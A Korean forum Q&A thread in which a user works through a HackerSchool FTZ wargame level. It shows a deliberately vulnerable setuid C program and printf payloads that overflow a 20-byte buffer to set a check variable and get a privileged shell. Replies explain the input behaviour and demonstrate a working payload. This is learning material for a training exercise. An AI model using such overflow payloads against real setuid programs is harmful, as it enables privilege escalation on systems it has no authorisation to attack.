현재 위치

›› Forums ›› 공부 ›› 설치 및 활용 QnA

쉘 명령에 관한 질문입니다...

IDNed의 이미지
글쓴이: IDNed / 작성시간: 화, 2006/01/31 - 12:42오후

해커스쿨 FTZ(telnet://ftz.hackerschool.org)에 요즘 푹 빠졌습니다. :)
혹시 깬분 계실지 모르지만 level14에서 막히는군요 -_-

문제 자체가 어려워서는 아니지만...
즉 그렇게 관련성이 있지는 않지만 문제부터 설명드리겠습니다.

Quote:

/home/level14/attackme라는 실행파일이 있습니다. level15로 suid 걸려서 어택해야 합니다.
이 명령은 실행시 값만 받고 그걸로 BOF에 성공하면 쉘을 내줍니다.
attackme의 코드입니다.
#include <stdio.h>
#include <unistd.h>

main()
{ int crap;
  int check;
  char buf[20];
  fgets(buf,45,stdin);
  if (check==0xdeadbeef)
   {
     setreuid(3095,3095);
     system("/bin/sh");
   }
}

즉 buf를 넘어서 check에 0xdeadbeef를 넣어야 합니다.
(확인결과 signed/unsigned 변수의 의미는 없습니다.)

저는 그래서...

printf "a\xef\xbe\xad\xde" | ~/attackme
printf "aa\xef\xbe\xad\xde" | ~/attackme
printf "aaa\xef\xbe\xad\xde" | ~/attackme
printf "aaaa\xef\xbe\xad\xde" | ~/attackme
......
(0xdeadbeef가 리틀 엔디안 순서로 저장되므로 꺼꾸로 적음)
이런식으로 넘치게 하려 했습니다.
질문하는 까닭이기도 하지만 안되더군요 -_-

그때 어디서 다른 분이 하는 코드를 보고 이렇게 바꿨습니다.

(printf "a\xef\xbe\xad\xde";cat) | ~/attackme
(printf "aa\xef\xbe\xad\xde";cat) | ~/attackme
(printf "aaa\xef\xbe\xad\xde";cat) | ~/attackme
(printf "aaaa\xef\xbe\xad\xde";cat) | ~/attackme

되더군요 @_@ 다만 매번 엔터키를 한번 더 쳐야 했지만 -_-

두개의 차이가 무엇인가요?
참고로 cat의 키보드 입력때 그냥 엔터만 쳤습니다.

Forums: 
설치 및 활용 QnA
Prentice의 이미지

글쓴이: Prentice / 작성시간: 수, 2006/02/01 - 12:27오후

~/attackme 대신에 hexdump류의 프로그램을 실행해보시면 어떨까요? od -x는 어떨까요?

덧. printf "aaaa\xef\xbe\xad\xde\n" | ~/attackme 이렇게는 해보셨나요?

IDNed의 이미지

글쓴이: IDNed / 작성시간: 수, 2006/02/01 - 1:00오후

Quote:

~/attackme 대신에 hexdump류의 프로그램을 실행해보시면 어떨까요? od -x는 어떨까요?

hexdump류라... 걍 hexdump나 od -x를 써보겠습니다.

Quote:
덧. printf "aaaa\xef\xbe\xad\xde\n" | ~/attackme 이렇게는 해보셨나요?

했는데 안됩니다. -_-
cat에서 엔터를 \n으로 먹여주는 거 같지는 않네요...

Prentice의 이미지

글쓴이: Prentice / 작성시간: 수, 2006/02/01 - 2:45오후

제 cygwin 설정상으로는 \n으로 재현(?)이 가능했습니다. \n 말고 \r도 있으니 참고하세요.

Fe.head의 이미지

글쓴이: Fe.head / 작성시간: 수, 2006/02/01 - 3:38오후

개인 리눅스서버에서 아래의 소스 가지고 테스트 해봤는데.

위의 방법되로 되던데요.

#include <stdio.h>
#include <unistd.h>

int main()
{
    int crap;
    int check;
    char buf[20];
    fgets(buf,45,stdin);
    if (check==0xdeadbeef) {
        printf("hello\n");
    }
    printf("%#x\n", check);

    return 0;
}



[fe.practice@will ~]
$ printf 'aaaaaaaaaaaaaaaaaaaaaaaa000\n'|./at
0xa303030

[fe.practice@will ~]
$ printf 'aaaaaaaaaaaaaaaaaaaaaaaa0000\n'|./at
0x30303030

[fe.practice@will ~]
$ printf 'aaaaaaaaaaaaaaaaaaaaaaaa\xef\xbe\xad\xde\n'|./at
hello
0xdeadbeef

고작 블로킹 하나, 고작 25점 중에 1점, 고작 부활동
"만약 그 순간이 온다면 그때가 네가 배구에 빠지는 순간이야"

댓글 달기

텍스트 포맷에 대한 자세한 정보

Filtered HTML

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

BBCode

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param>
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

Textile

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • You can use Textile markup to format text.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Markdown

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • Quick Tips:
    • Two or more spaces at a line's end = Line break
    • Double returns = Paragraph
    • *Single asterisks* or _single underscores_ = Emphasis
    • **Double** or __double__ = Strong
    • This is [a link](http://the.link.example.com "The optional title text")
    For complete details on the Markdown syntax, see the Markdown documentation and Markdown Extra documentation for tables, footnotes, and more.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Plain text

  • HTML 태그를 사용할 수 없습니다.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 줄과 단락은 자동으로 분리됩니다.
댓글 첨부 파일
이 댓글에 이미지나 파일을 업로드 합니다.
파일 크기는 8 MB보다 작아야 합니다.
허용할 파일 형식: txt pdf doc xls gif jpg jpeg mp3 png rar zip.
CAPTCHA
이것은 자동으로 스팸을 올리는 것을 막기 위해서 제공됩니다.